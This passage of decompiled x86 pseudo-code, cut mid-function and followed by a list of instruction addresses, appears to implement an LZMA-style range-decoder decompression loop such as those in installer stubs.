                                                              											case 9:
                                                              												__eflags =  *(__ebp - 0x40);
                                                              												if( *(__ebp - 0x40) != 0) {
                                                              													goto L89;
                                                              												}
                                                              												__eflags =  *(__ebp - 0x60);
                                                              												if( *(__ebp - 0x60) == 0) {
                                                              													goto L171;
                                                              												}
                                                              												__eax = 0;
                                                              												__eflags =  *(__ebp - 0x38) - 7;
                                                              												_t259 =  *(__ebp - 0x38) - 7 >= 0;
                                                              												__eflags = _t259;
                                                              												0 | _t259 = _t259 + _t259 + 9;
                                                              												 *(__ebp - 0x38) = _t259 + _t259 + 9;
                                                              												goto L76;
                                                              											case 0xa:
                                                              												goto L0;
                                                              											case 0xb:
                                                              												__eflags =  *(__ebp - 0x40);
                                                              												if( *(__ebp - 0x40) != 0) {
                                                              													__ecx =  *(__ebp - 0x24);
                                                              													__eax =  *(__ebp - 0x20);
                                                              													 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                              												} else {
                                                              													__eax =  *(__ebp - 0x24);
                                                              												}
                                                              												__ecx =  *(__ebp - 0x28);
                                                              												 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                              												goto L88;
                                                              											case 0xc:
                                                              												L99:
                                                              												__eflags =  *(__ebp - 0x6c);
                                                              												if( *(__ebp - 0x6c) == 0) {
                                                              													 *(__ebp - 0x88) = 0xc;
                                                              													goto L170;
                                                              												}
                                                              												__ecx =  *(__ebp - 0x70);
                                                              												__eax =  *(__ebp - 0xc);
                                                              												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                              												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                              												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                              												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                              												_t334 = __ebp - 0x70;
                                                              												 *_t334 =  *(__ebp - 0x70) + 1;
                                                              												__eflags =  *_t334;
                                                              												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                              												__eax =  *(__ebp - 0x2c);
                                                              												goto L101;
                                                              											case 0xd:
                                                              												L37:
                                                              												__eflags =  *(__ebp - 0x6c);
                                                              												if( *(__ebp - 0x6c) == 0) {
                                                              													 *(__ebp - 0x88) = 0xd;
                                                              													goto L170;
                                                              												}
                                                              												__ecx =  *(__ebp - 0x70);
                                                              												__eax =  *(__ebp - 0xc);
                                                              												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                              												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                              												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                              												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                              												_t122 = __ebp - 0x70;
                                                              												 *_t122 =  *(__ebp - 0x70) + 1;
                                                              												__eflags =  *_t122;
                                                              												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                              												L39:
                                                              												__eax =  *(__ebp - 0x40);
                                                              												__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                                              												if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                                                              													goto L48;
                                                              												}
                                                              												__eflags = __ebx - 0x100;
                                                              												if(__ebx >= 0x100) {
                                                              													goto L54;
                                                              												}
                                                              												L41:
                                                              												__eax =  *(__ebp - 0x5b) & 0x000000ff;
                                                              												 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                                                              												__ecx =  *(__ebp - 0x58);
                                                              												__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                                                              												 *(__ebp - 0x48) = __eax;
                                                              												__eax = __eax + 1;
                                                              												__eax = __eax << 8;
                                                              												__eax = __eax + __ebx;
                                                              												__esi =  *(__ebp - 0x58) + __eax * 2;
                                                              												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                              												__ax =  *__esi;
                                                              												 *(__ebp - 0x54) = __esi;
                                                              												__edx = __ax & 0x0000ffff;
                                                              												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                                                              												__eflags =  *(__ebp - 0xc) - __ecx;
                                                              												if( *(__ebp - 0xc) >= __ecx) {
                                                              													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                              													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                              													__cx = __ax;
                                                              													 *(__ebp - 0x40) = 1;
                                                              													__cx = __ax >> 5;
                                                              													__eflags = __eax;
                                                              													__ebx = __ebx + __ebx + 1;
                                                              													 *__esi = __ax;
                                                              												} else {
                                                              													 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                                                              													 *(__ebp - 0x10) = __ecx;
                                                              													0x800 = 0x800 - __edx;
                                                              													0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                                                              													__ebx = __ebx + __ebx;
                                                              													 *__esi = __cx;
                                                              												}
                                                              												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                              												 *(__ebp - 0x44) = __ebx;
                                                              												if( *(__ebp - 0x10) >= 0x1000000) {
                                                              													goto L39;
                                                              												} else {
                                                              													goto L37;
                                                              												}
                                                              											case 0xe:
                                                              												L46:
                                                              												__eflags =  *(__ebp - 0x6c);
                                                              												if( *(__ebp - 0x6c) == 0) {
                                                              													 *(__ebp - 0x88) = 0xe;
                                                              													goto L170;
                                                              												}
                                                              												__ecx =  *(__ebp - 0x70);
                                                              												__eax =  *(__ebp - 0xc);
                                                              												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                              												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                              												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                              												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                              												_t156 = __ebp - 0x70;
                                                              												 *_t156 =  *(__ebp - 0x70) + 1;
                                                              												__eflags =  *_t156;
                                                              												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                              												while(1) {
                                                              													L48:
                                                              													__eflags = __ebx - 0x100;
                                                              													if(__ebx >= 0x100) {
                                                              														break;
                                                              													}
                                                              													__eax =  *(__ebp - 0x58);
                                                              													__edx = __ebx + __ebx;
                                                              													__ecx =  *(__ebp - 0x10);
                                                              													__esi = __edx + __eax;
                                                              													__ecx =  *(__ebp - 0x10) >> 0xb;
                                                              													__ax =  *__esi;
                                                              													 *(__ebp - 0x54) = __esi;
                                                              													__edi = __ax & 0x0000ffff;
                                                              													__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                              													__eflags =  *(__ebp - 0xc) - __ecx;
                                                              													if( *(__ebp - 0xc) >= __ecx) {
                                                              														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                              														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                              														__cx = __ax;
                                                              														_t170 = __edx + 1; // 0x1
                                                              														__ebx = _t170;
                                                              														__cx = __ax >> 5;
                                                              														__eflags = __eax;
                                                              														 *__esi = __ax;
                                                              													} else {
                                                              														 *(__ebp - 0x10) = __ecx;
                                                              														0x800 = 0x800 - __edi;
                                                              														0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                              														__ebx = __ebx + __ebx;
                                                              														 *__esi = __cx;
                                                              													}
                                                              													__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                              													 *(__ebp - 0x44) = __ebx;
                                                              													if( *(__ebp - 0x10) >= 0x1000000) {
                                                              														continue;
                                                              													} else {
                                                              														goto L46;
                                                              													}
                                                              												}
                                                              												L54:
                                                              												_t173 = __ebp - 0x34;
                                                              												 *_t173 =  *(__ebp - 0x34) & 0x00000000;
                                                              												__eflags =  *_t173;
                                                              												goto L55;
                                                              											case 0xf:
                                                              												L58:
                                                              												__eflags =  *(__ebp - 0x6c);
                                                              												if( *(__ebp - 0x6c) == 0) {
                                                              													 *(__ebp - 0x88) = 0xf;
                                                              													goto L170;
                                                              												}
                                                              												__ecx =  *(__ebp - 0x70);
                                                              												__eax =  *(__ebp - 0xc);
                                                              												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                              												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                              												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                              												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                              												_t203 = __ebp - 0x70;
                                                              												 *_t203 =  *(__ebp - 0x70) + 1;
                                                              												__eflags =  *_t203;
                                                              												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                              												L60:
                                                              												__eflags = __ebx - 0x100;
                                                              												if(__ebx >= 0x100) {
                                                              													L55:
                                                              													__al =  *(__ebp - 0x44);
                                                              													 *(__ebp - 0x5c) =  *(__ebp - 0x44);
                                                              													goto L56;
                                                              												}
                                                              												L61:
                                                              												__eax =  *(__ebp - 0x58);
                                                              												__edx = __ebx + __ebx;
                                                              												__ecx =  *(__ebp - 0x10);
                                                              												__esi = __edx + __eax;
                                                              												__ecx =  *(__ebp - 0x10) >> 0xb;
                                                              												__ax =  *__esi;
                                                              												 *(__ebp - 0x54) = __esi;
                                                              												__edi = __ax & 0x0000ffff;
                                                              												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                              												__eflags =  *(__ebp - 0xc) - __ecx;
                                                              												if( *(__ebp - 0xc) >= __ecx) {
                                                              													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                              													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                              													__cx = __ax;
                                                              													_t217 = __edx + 1; // 0x1
                                                              													__ebx = _t217;
                                                              													__cx = __ax >> 5;
                                                              													__eflags = __eax;
                                                              													 *__esi = __ax;
                                                              												} else {
                                                              													 *(__ebp - 0x10) = __ecx;
                                                              													0x800 = 0x800 - __edi;
                                                              													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                              													__ebx = __ebx + __ebx;
                                                              													 *__esi = __cx;
                                                              												}
                                                              												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                              												 *(__ebp - 0x44) = __ebx;
                                                              												if( *(__ebp - 0x10) >= 0x1000000) {
                                                              													goto L60;
                                                              												} else {
                                                              													goto L58;
                                                              												}
                                                              											case 0x10:
                                                              												L109:
                                                              												__eflags =  *(__ebp - 0x6c);
                                                              												if( *(__ebp - 0x6c) == 0) {
                                                              													 *(__ebp - 0x88) = 0x10;
                                                              													goto L170;
                                                              												}
                                                              												__ecx =  *(__ebp - 0x70);
                                                              												__eax =  *(__ebp - 0xc);
                                                              												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                              												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                              												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                              												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                              												_t365 = __ebp - 0x70;
                                                              												 *_t365 =  *(__ebp - 0x70) + 1;
                                                              												__eflags =  *_t365;
                                                              												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                              												goto L111;
                                                              											case 0x11:
                                                              												goto L69;
                                                              											case 0x12:
                                                              												__eflags =  *(__ebp - 0x40);
                                                              												if( *(__ebp - 0x40) != 0) {
                                                              													__eax =  *(__ebp - 0x58);
                                                              													 *(__ebp - 0x84) = 0x13;
                                                              													__esi =  *(__ebp - 0x58) + 2;
                                                              													while(1) {
                                                              														L132:
                                                              														 *(_t613 - 0x54) = _t606;
                                                              														goto L133;
                                                              													}
                                                              												}
                                                              												__eax =  *(__ebp - 0x4c);
                                                              												 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
                                                              												__ecx =  *(__ebp - 0x58);
                                                              												__eax =  *(__ebp - 0x4c) << 4;
                                                              												__eflags = __eax;
                                                              												__eax =  *(__ebp - 0x58) + __eax + 4;
                                                              												goto L130;
                                                              											case 0x13:
                                                              												__eflags =  *(__ebp - 0x40);
                                                              												if( *(__ebp - 0x40) != 0) {
                                                              													_t469 = __ebp - 0x58;
                                                              													 *_t469 =  *(__ebp - 0x58) + 0x204;
                                                              													__eflags =  *_t469;
                                                              													 *(__ebp - 0x30) = 0x10;
                                                              													 *(__ebp - 0x40) = 8;
                                                              													L144:
                                                              													 *(__ebp - 0x7c) = 0x14;
                                                              													goto L145;
                                                              												}
                                                              												__eax =  *(__ebp - 0x4c);
                                                              												__ecx =  *(__ebp - 0x58);
                                                              												__eax =  *(__ebp - 0x4c) << 4;
                                                              												 *(__ebp - 0x30) = 8;
                                                              												__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
                                                              												L130:
                                                              												 *(__ebp - 0x58) = __eax;
                                                              												 *(__ebp - 0x40) = 3;
                                                              												goto L144;
                                                              											case 0x14:
                                                              												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
                                                              												__eax =  *(__ebp - 0x80);
                                                              												 *(_t613 - 0x88) = _t533;
                                                              												goto L1;
                                                              											case 0x15:
                                                              												__eax = 0;
                                                              												__eflags =  *(__ebp - 0x38) - 7;
                                                              												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                              												__al = __al & 0x000000fd;
                                                              												__eax = (__eflags >= 0) - 1 + 0xb;
                                                              												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
                                                              												goto L120;
                                                              											case 0x16:
                                                              												__eax =  *(__ebp - 0x30);
                                                              												__eflags = __eax - 4;
                                                              												if(__eax >= 4) {
                                                              													_push(3);
                                                              													_pop(__eax);
                                                              												}
                                                              												__ecx =  *(__ebp - 4);
                                                              												 *(__ebp - 0x40) = 6;
                                                              												__eax = __eax << 7;
                                                              												 *(__ebp - 0x7c) = 0x19;
                                                              												 *(__ebp - 0x58) = __eax;
                                                              												goto L145;
                                                              											case 0x17:
                                                              												L145:
                                                              												__eax =  *(__ebp - 0x40);
                                                              												 *(__ebp - 0x50) = 1;
                                                              												 *(__ebp - 0x48) =  *(__ebp - 0x40);
                                                              												goto L149;
                                                              											case 0x18:
                                                              												L146:
                                                              												__eflags =  *(__ebp - 0x6c);
                                                              												if( *(__ebp - 0x6c) == 0) {
                                                              													 *(__ebp - 0x88) = 0x18;
                                                              													goto L170;
                                                              												}
                                                              												__ecx =  *(__ebp - 0x70);
                                                              												__eax =  *(__ebp - 0xc);
                                                              												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                              												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                              												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                              												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                              												_t484 = __ebp - 0x70;
                                                              												 *_t484 =  *(__ebp - 0x70) + 1;
                                                              												__eflags =  *_t484;
                                                              												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                              												L148:
                                                              												_t487 = __ebp - 0x48;
                                                              												 *_t487 =  *(__ebp - 0x48) - 1;
                                                              												__eflags =  *_t487;
                                                              												L149:
                                                              												__eflags =  *(__ebp - 0x48);
                                                              												if( *(__ebp - 0x48) <= 0) {
                                                              													__ecx =  *(__ebp - 0x40);
                                                              													__ebx =  *(__ebp - 0x50);
                                                              													0 = 1;
                                                              													__eax = 1 << __cl;
                                                              													__ebx =  *(__ebp - 0x50) - (1 << __cl);
                                                              													__eax =  *(__ebp - 0x7c);
                                                              													 *(__ebp - 0x44) = __ebx;
                                                              													while(1) {
                                                              														 *(_t613 - 0x88) = _t533;
                                                              														goto L1;
                                                              													}
                                                              												}
                                                              												__eax =  *(__ebp - 0x50);
                                                              												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                              												__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                                              												__eax =  *(__ebp - 0x58);
                                                              												__esi = __edx + __eax;
                                                              												 *(__ebp - 0x54) = __esi;
                                                              												__ax =  *__esi;
                                                              												__edi = __ax & 0x0000ffff;
                                                              												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                              												__eflags =  *(__ebp - 0xc) - __ecx;
                                                              												if( *(__ebp - 0xc) >= __ecx) {
                                                              													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                              													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                              													__cx = __ax;
                                                              													__cx = __ax >> 5;
                                                              													__eax = __eax - __ecx;
                                                              													__edx = __edx + 1;
                                                              													__eflags = __edx;
                                                              													 *__esi = __ax;
                                                              													 *(__ebp - 0x50) = __edx;
                                                              												} else {
                                                              													 *(__ebp - 0x10) = __ecx;
                                                              													0x800 = 0x800 - __edi;
                                                              													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                              													 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                                              													 *__esi = __cx;
                                                              												}
                                                              												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                              												if( *(__ebp - 0x10) >= 0x1000000) {
                                                              													goto L148;
                                                              												} else {
                                                              													goto L146;
                                                              												}
                                                              											case 0x19:
                                                              												__eflags = __ebx - 4;
                                                              												if(__ebx < 4) {
                                                              													 *(__ebp - 0x2c) = __ebx;
                                                              													L119:
                                                              													_t393 = __ebp - 0x2c;
                                                              													 *_t393 =  *(__ebp - 0x2c) + 1;
                                                              													__eflags =  *_t393;
                                                              													L120:
                                                              													__eax =  *(__ebp - 0x2c);
                                                              													__eflags = __eax;
                                                              													if(__eax == 0) {
                                                              														 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
                                                              														goto L170;
                                                              													}
                                                              													__eflags = __eax -  *(__ebp - 0x60);
                                                              													if(__eax >  *(__ebp - 0x60)) {
                                                              														goto L171;
                                                              													}
                                                              													 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
                                                              													__eax =  *(__ebp - 0x30);
                                                              													_t400 = __ebp - 0x60;
                                                              													 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
                                                              													__eflags =  *_t400;
                                                              													goto L123;
                                                              												}
                                                              												__ecx = __ebx;
                                                              												__eax = __ebx;
                                                              												__ecx = __ebx >> 1;
                                                              												__eax = __ebx & 0x00000001;
                                                              												__ecx = (__ebx >> 1) - 1;
                                                              												__al = __al | 0x00000002;
                                                              												__eax = (__ebx & 0x00000001) << __cl;
                                                              												__eflags = __ebx - 0xe;
                                                              												 *(__ebp - 0x2c) = __eax;
                                                              												if(__ebx >= 0xe) {
                                                              													__ebx = 0;
                                                              													 *(__ebp - 0x48) = __ecx;
                                                              													L102:
                                                              													__eflags =  *(__ebp - 0x48);
                                                              													if( *(__ebp - 0x48) <= 0) {
                                                              														__eax = __eax + __ebx;
                                                              														 *(__ebp - 0x40) = 4;
                                                              														 *(__ebp - 0x2c) = __eax;
                                                              														__eax =  *(__ebp - 4);
                                                              														__eax =  *(__ebp - 4) + 0x644;
                                                              														__eflags = __eax;
                                                              														L108:
                                                              														__ebx = 0;
                                                              														 *(__ebp - 0x58) = __eax;
                                                              														 *(__ebp - 0x50) = 1;
                                                              														 *(__ebp - 0x44) = 0;
                                                              														 *(__ebp - 0x48) = 0;
                                                              														L112:
                                                              														__eax =  *(__ebp - 0x40);
                                                              														__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                                              														if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
                                                              															_t391 = __ebp - 0x2c;
                                                              															 *_t391 =  *(__ebp - 0x2c) + __ebx;
                                                              															__eflags =  *_t391;
                                                              															goto L119;
                                                              														}
                                                              														__eax =  *(__ebp - 0x50);
                                                              														 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                              														__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                                              														__eax =  *(__ebp - 0x58);
                                                              														__esi = __edi + __eax;
                                                              														 *(__ebp - 0x54) = __esi;
                                                              														__ax =  *__esi;
                                                              														__ecx = __ax & 0x0000ffff;
                                                              														__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
                                                              														__eflags =  *(__ebp - 0xc) - __edx;
                                                              														if( *(__ebp - 0xc) >= __edx) {
                                                              															__ecx = 0;
                                                              															 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
                                                              															__ecx = 1;
                                                              															 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
                                                              															__ebx = 1;
                                                              															__ecx =  *(__ebp - 0x48);
                                                              															__ebx = 1 << __cl;
                                                              															__ecx = 1 << __cl;
                                                              															__ebx =  *(__ebp - 0x44);
                                                              															__ebx =  *(__ebp - 0x44) | __ecx;
                                                              															__cx = __ax;
                                                              															__cx = __ax >> 5;
                                                              															__eax = __eax - __ecx;
                                                              															__edi = __edi + 1;
                                                              															__eflags = __edi;
                                                              															 *(__ebp - 0x44) = __ebx;
                                                              															 *__esi = __ax;
                                                              															 *(__ebp - 0x50) = __edi;
                                                              														} else {
                                                              															 *(__ebp - 0x10) = __edx;
                                                              															0x800 = 0x800 - __ecx;
                                                              															0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                                                              															 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                                              															 *__esi = __dx;
                                                              														}
                                                              														__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                              														if( *(__ebp - 0x10) >= 0x1000000) {
                                                              															L111:
                                                              															_t368 = __ebp - 0x48;
                                                              															 *_t368 =  *(__ebp - 0x48) + 1;
                                                              															__eflags =  *_t368;
                                                              															goto L112;
                                                              														} else {
                                                              															goto L109;
                                                              														}
                                                              													}
                                                              													__ecx =  *(__ebp - 0xc);
                                                              													__ebx = __ebx + __ebx;
                                                              													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
                                                              													__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                                              													 *(__ebp - 0x44) = __ebx;
                                                              													if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
                                                              														__ecx =  *(__ebp - 0x10);
                                                              														 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                                              														__ebx = __ebx | 0x00000001;
                                                              														__eflags = __ebx;
                                                              														 *(__ebp - 0x44) = __ebx;
                                                              													}
                                                              													__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                              													if( *(__ebp - 0x10) >= 0x1000000) {
                                                              														L101:
                                                              														_t338 = __ebp - 0x48;
                                                              														 *_t338 =  *(__ebp - 0x48) - 1;
                                                              														__eflags =  *_t338;
                                                              														goto L102;
                                                              													} else {
                                                              														goto L99;
                                                              													}
                                                              												}
                                                              												__edx =  *(__ebp - 4);
                                                              												__eax = __eax - __ebx;
                                                              												 *(__ebp - 0x40) = __ecx;
                                                              												__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
                                                              												goto L108;
                                                              											case 0x1a:
                                                              												L56:
                                                              												__eflags =  *(__ebp - 0x64);
                                                              												if( *(__ebp - 0x64) == 0) {
                                                              													 *(__ebp - 0x88) = 0x1a;
                                                              													goto L170;
                                                              												}
                                                              												__ecx =  *(__ebp - 0x68);
                                                              												__al =  *(__ebp - 0x5c);
                                                              												__edx =  *(__ebp - 8);
                                                              												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                                              												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                              												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                                              												 *( *(__ebp - 0x68)) = __al;
                                                              												__ecx =  *(__ebp - 0x14);
                                                              												 *(__ecx +  *(__ebp - 8)) = __al;
                                                              												__eax = __ecx + 1;
                                                              												__edx = 0;
                                                              												_t192 = __eax %  *(__ebp - 0x74);
                                                              												__eax = __eax /  *(__ebp - 0x74);
                                                              												__edx = _t192;
                                                              												goto L80;
                                                              											case 0x1b:
                                                              												L76:
                                                              												__eflags =  *(__ebp - 0x64);
                                                              												if( *(__ebp - 0x64) == 0) {
                                                              													 *(__ebp - 0x88) = 0x1b;
                                                              													goto L170;
                                                              												}
                                                              												__eax =  *(__ebp - 0x14);
                                                              												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                              												__eflags = __eax -  *(__ebp - 0x74);
                                                              												if(__eax >=  *(__ebp - 0x74)) {
                                                              													__eax = __eax +  *(__ebp - 0x74);
                                                              													__eflags = __eax;
                                                              												}
                                                              												__edx =  *(__ebp - 8);
                                                              												__cl =  *(__eax + __edx);
                                                              												__eax =  *(__ebp - 0x14);
                                                              												 *(__ebp - 0x5c) = __cl;
                                                              												 *(__eax + __edx) = __cl;
                                                              												__eax = __eax + 1;
                                                              												__edx = 0;
                                                              												_t275 = __eax %  *(__ebp - 0x74);
                                                              												__eax = __eax /  *(__ebp - 0x74);
                                                              												__edx = _t275;
                                                              												__eax =  *(__ebp - 0x68);
                                                              												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                                              												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                              												_t284 = __ebp - 0x64;
                                                              												 *_t284 =  *(__ebp - 0x64) - 1;
                                                              												__eflags =  *_t284;
                                                              												 *( *(__ebp - 0x68)) = __cl;
                                                              												L80:
                                                              												 *(__ebp - 0x14) = __edx;
                                                              												goto L81;
                                                              											case 0x1c:
                                                              												while(1) {
                                                              													L123:
                                                              													__eflags =  *(__ebp - 0x64);
                                                              													if( *(__ebp - 0x64) == 0) {
                                                              														break;
                                                              													}
                                                              													__eax =  *(__ebp - 0x14);
                                                              													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                              													__eflags = __eax -  *(__ebp - 0x74);
                                                              													if(__eax >=  *(__ebp - 0x74)) {
                                                              														__eax = __eax +  *(__ebp - 0x74);
                                                              														__eflags = __eax;
                                                              													}
                                                              													__edx =  *(__ebp - 8);
                                                              													__cl =  *(__eax + __edx);
                                                              													__eax =  *(__ebp - 0x14);
                                                              													 *(__ebp - 0x5c) = __cl;
                                                              													 *(__eax + __edx) = __cl;
                                                              													__eax = __eax + 1;
                                                              													__edx = 0;
                                                              													_t414 = __eax %  *(__ebp - 0x74);
                                                              													__eax = __eax /  *(__ebp - 0x74);
                                                              													__edx = _t414;
                                                              													__eax =  *(__ebp - 0x68);
                                                              													 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                              													 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                                              													 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
                                                              													__eflags =  *(__ebp - 0x30);
                                                              													 *( *(__ebp - 0x68)) = __cl;
                                                              													 *(__ebp - 0x14) = _t414;
                                                              													if( *(__ebp - 0x30) > 0) {
                                                              														continue;
                                                              													} else {
                                                              														L81:
                                                              														 *(__ebp - 0x88) = 2;
                                                              														goto L1;
                                                              													}
                                                              												}
                                                              												 *(__ebp - 0x88) = 0x1c;
                                                              												goto L170;
                                                              										}
                                                              									}
                                                              									L171:
                                                              									_t535 = _t534 | 0xffffffff;
                                                              									goto L172;
                                                              								}
                                                              							}
                                                              						}
                                                              					}
                                                              					goto L1;
                                                              				}
                                                              			}













                                                              0x00000000
                                                              0x0040711c
                                                              0x0040711c
                                                              0x00407120
                                                              0x0040712d
                                                              0x00407137
                                                              0x00000000
                                                              0x00407122
                                                              0x00407122
                                                              0x0040715d
                                                              0x00407160
                                                              0x00407163
                                                              0x00407166
                                                              0x00407166
                                                              0x00407169
                                                              0x00407170
                                                              0x00407175
                                                              0x00407056
                                                              0x00407059
                                                              0x004073cb
                                                              0x004073cb
                                                              0x004073cb
                                                              0x004073ce
                                                              0x004073ce
                                                              0x004073ce
                                                              0x004073d4
                                                              0x004073da
                                                              0x004073e0
                                                              0x004073fa
                                                              0x004073fd
                                                              0x00407403
                                                              0x0040740e
                                                              0x00407410
                                                              0x004073e2
                                                              0x004073e2
                                                              0x004073f1
                                                              0x004073f5
                                                              0x004073f5
                                                              0x0040741a
                                                              0x00000000
                                                              0x00000000
                                                              0x0040741c
                                                              0x00407420
                                                              0x004075cf
                                                              0x004075e5
                                                              0x004075ed
                                                              0x004075f4
                                                              0x004075f6
                                                              0x004075fd
                                                              0x00407601
                                                              0x00407601
                                                              0x0040742c
                                                              0x00407433
                                                              0x0040743b
                                                              0x0040743e
                                                              0x00407441
                                                              0x00407441
                                                              0x00407447
                                                              0x00407447
                                                              0x00406be3
                                                              0x00406be3
                                                              0x00406be3
                                                              0x00406bec
                                                              0x00000000
                                                              0x00000000
                                                              0x00406bf2
                                                              0x00000000
                                                              0x00406bfd
                                                              0x00000000
                                                              0x00000000
                                                              0x00406c06
                                                              0x00406c09
                                                              0x00406c0c
                                                              0x00406c10
                                                              0x00000000
                                                              0x00000000
                                                              0x00406c16
                                                              0x00406c19
                                                              0x00406c1b
                                                              0x00406c1c
                                                              0x00406c1f
                                                              0x00406c21
                                                              0x00406c22
                                                              0x00406c24
                                                              0x00406c27
                                                              0x00406c2c
                                                              0x00406c31
                                                              0x00406c3a
                                                              0x00406c4d
                                                              0x00406c50
                                                              0x00406c5c
                                                              0x00406c84
